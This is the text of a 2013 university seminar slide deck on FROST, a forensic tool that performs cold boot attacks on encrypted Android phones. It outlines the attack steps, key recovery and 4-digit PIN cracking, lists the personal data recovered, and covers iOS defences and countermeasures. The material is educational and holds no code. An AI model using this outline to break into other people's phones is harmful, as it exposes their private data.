Chair for Network Architectures and ServicesFaculty of Computer ScienceTechnical University Munich

Forensic Recovery of Scrambled Telephones

Dai Yang

Proseminar: Network Hacking and Defence WS2013

Advisor: Tsvetko Tsvetkov

December 13th, 2013

FROST 2Android -> FDE -> CBA | FROST | Countermeasures | Conclusion

Contents

Introduction: Meaning of Smartphones

Background

Android

Full Disk Encryption

Cold Boot Attack

Forensic Recovery of Scrambled Telephones

Vulnerability of iOS and Countermeasure

Conclusion

References

FROST 3Android -> FDE -> CBA | FROST | Countermeasures | Conclusion

Introduction

Almost every second person in Germany has a smartphone Smartphones are widely used, both for private and business use Lack of awareness concerning personal data

Sources: 2013 ComScore MobiLens. Data evaluated with Statista. Numbers are in Millions.

FROST 4Android -> FDE -> CBA | FROST | Countermeasures | Conclusion

backgROUnd

FROST 5Android -> FDE -> CBA | FROST | Countermeasures | Conclusion

Android

Google initialized mobile OS as open standard

Launched in 2008 with T-Mobile G1

Linux kernel based architecture Linux Kernel (Drivers, Power Manager, etc.) Libraries (SQLite, WebKit, SSL, OpenGL, etc.) Application Framework (Activity Manager, Window Manager, etc.) Native applications (Home, Contacts, etc.) Android Runtime (Core Libraries and DVM, since “KitKat”: ART)

Modern Security Features since 4.0: FDE via dm-crypt since 4.3: Security Enhanced Linux (SEL) Pattern-Lock or PIN separate user data partition less secure on “rooted” devices

Source: http://www.gsmarena.com/t_mobile_g1-pictures-2533.php, last visited on 2013/11/17 at 16:18

FROST 6Android -> FDE -> CBA | FROST | Countermeasures | Conclusion

Full Disk Encryption

Techniques: dm-crypt (Linux), FileVault (Apple), BitLocker (MS)

AES-Algorithm

Hardware based: eg. crypto cellphone

Pros:

Transparency

Safe swap space and

temporary files

User independent

Immediate data destruction

Cons:

Vulnerability to CBA

Side Channel attack

Cryptanalysis

Single key

Unsafe boot region

FROST 7Android -> FDE -> CBA | FROST | Countermeasures | Conclusion

Software based Full Disk Encryption

FROST 8Android -> FDE -> CBA | FROST | Countermeasures | Conclusion

Cold Boot Attack

aka. platform reset attack, cold ghosting attack, iceman attack

Side Channel Attack

Physical access

Target: encryption keys

How to:

Press reset (Cold boot)

Boot with special sector

Dump the memory

Alternative:

JTAG Port

Insert to other Computer

Sources: Based on [6]. FROST, FAU-Erlangen Nueremberg, Oct 2012

time / bit errors / temperature

FROST 9Android -> FDE -> CBA | FROST | Countermeasures | Conclusion

FroST

FROST 10Android -> FDE -> CBA | FROST | Countermeasures | Conclusion

Forensic Recovery of Scrambled Telephones

FROST 11Android -> FDE -> CBA | FROST | Countermeasures | Conclusion

Functionality of FROST

In general

Check the encryption state

Key recovery

RAM dump via USB

Crack 4-digit PIN

If boot loader is unlocked / developer mode enabled, in additional

Decrypt and mount /data

Sources: FROST user interface. http://www1.informatik.uni-erlangen.de/frost, last visit: 2013/11/17 at 21:38

FROST 12Android -> FDE -> CBA | FROST | Countermeasures | Conclusion

Results from FROST

Full data in the RAM, including New and old personal photos (Dropbox)

Recently visited websites

E-mails

Entire WhatsApp chat history

Personal text files

Contacts

Calendar entries

WiFi credentials in plain text

Other personal plain text files

Other plain text credentials

GPS coordinates

List of recent phone calls

etc.

very sensitive

information

FROST 13Android -> FDE -> CBA | FROST | Countermeasures | Conclusion

Evaluation

FROST 14Android -> FDE -> CBA | FROST | Countermeasures | Conclusion

Vulnerability of iOS and Countermeasures

iOS (almost) not vulnerable to cold boot attack

wipe out key from RAM

AES-Key = UUID + User Passcode

High iterations time

GUI-Protection, Wipe Out

Since iOS7 + iPhone 5S: Key/Fingerprint for better security

Countermeasures Cache/Register-Based

Soldering the memory

Key Wipe

Memory Wipe

2-Way authentication

Full memory encryption

FROST 15Android -> FDE -> CBA | FROST | Countermeasures | Conclusion

Conclusion

FROST 16Android -> FDE -> CBA | FROST | Countermeasures | Conclusion

Questions

FROST 17Android -> FDE -> CBA | FROST | Countermeasures | Conclusion

References

[1] “Global market share held by tablet operating systems in 2013”, survey by IDC, Source from Statista, March 2013

[2] “Android technical specs”, official description by Open Headset alliance. Source: http://source.android.com/devices/tech/, last visit: 2013/11/17 at 16:33

[3] “Linux kernel device-mapper crypto target”, DMCrypt. Source: https://code.google.com/p/cryptsetup/wiki/DMCrypt, last visit: 2013/11/17 at 17:47

[4] “An in-depth analysis of the cold boot attack”, R.Carbone, C. Bean, M. Salois, Ministry of National Defence, Jan. 2011

[5] “Let We Remember: Cold Boot Attacks on Encryptions Keys”, J.A. Halderman, S.D. Schoen, N. Heininger, W. Clarkcson, W. Paul, J.A. Calandrino, A.J. Feldman, J. Appelbaum, E.W. Felten. In Proceedings of the 17th USENIX Security Symposium, Princetiong University, USENIX Assosiation, pp. 45-60

[6] “Forensic Recovery of Scrambled Telephones”, T. Mueller, M. Spreizenbarth, F.C. Freiling, FAU Erlangen Nuremburg, Oct. 2012

[7] “iOS Security”, Apple Inc., Whitepaper. Source: http://www.apple.com/ipad/business/docs/iOS_Security_Oct12.pdf, last visit: 2013/11/20 at 11:56

Chair for Network Architectures and ServicesFaculty of Computer ScienceTechnical University Munich

Forensic Recovery of Scrambled Telephones

Dai Yang

Proseminar: Network Hacking and Defence WS2013

Instructor: Tsvetko Tsvetkov

December 13th, 2013